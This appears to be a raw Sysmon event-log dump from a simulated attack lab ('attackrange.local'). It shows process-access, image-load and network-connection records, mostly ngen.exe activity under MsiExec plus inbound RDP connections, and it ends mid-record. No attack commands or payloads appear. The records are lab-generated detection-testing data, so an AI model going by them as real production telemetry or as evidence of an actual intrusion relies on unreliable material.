14:57:21.093{A7A01FEF-EBD1-607E-070C-00000000BB01}42681288C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-060C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.093{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-070C-00000000BB01}4268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.093{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-060C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.093{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-060C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.077{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-040C-00000000BB01}3168c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.077{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-040C-00000000BB01}3168c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.077{A7A01FEF-EBD1-607E-040C-00000000BB01}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.061{A7A01FEF-EBD1-607E-050C-00000000BB01}20764856C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-040C-00000000BB01}3168c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.046{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-050C-00000000BB01}2076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.046{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-040C-00000000BB01}3168c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.046{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-040C-00000000BB01}3168c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.030{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-020C-00000000BB01}5580c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.030{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-020C-00000000BB01}5580c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.030{A7A01FEF-EBD1-607E-020C-00000000BB01}5580C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.015{A7A01FEF-EBD1-607E-030C-00000000BB01}1512824C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-020C-00000000BB01}5580c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.015{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-030C-00000000BB01}1512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.999{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-020C-00000000BB01}5580c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.999{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-020C-00000000BB01}5580c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.999{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-000C-00000000BB01}6556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.999{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-000C-00000000BB01}6556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.999{A7A01FEF-EBD0-607E-000C-00000000BB01}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 354300x800000000000000050254Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:20.101{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53459-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050253Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:20.000{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50508-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050252Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:21.938{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C365B3BD6C11932B8CE0B6CE2C190D,SHA256=25C031DFA588FC8086187C3F5E143AFE47F59FFB3F9052D346D680EDFCF50A60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.983{A7A01FEF-EBD2-607E-610C-00000000BB01}45721388C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-600C-00000000BB01}3192c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.968{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-610C-00000000BB01}4572C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.968{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-600C-00000000BB01}3192c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.968{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-600C-00000000BB01}3192c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.952{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-5E0C-00000000BB01}1572c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.952{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-5E0C-00000000BB01}1572c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.952{A7A01FEF-EBD2-607E-5E0C-00000000BB01}1572C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.936{A7A01FEF-EBD2-607E-5F0C-00000000BB01}42526588C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-5E0C-00000000BB01}1572c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.936{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-5F0C-00000000BB01}4252C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.921{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-5E0C-00000000BB01}1572c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 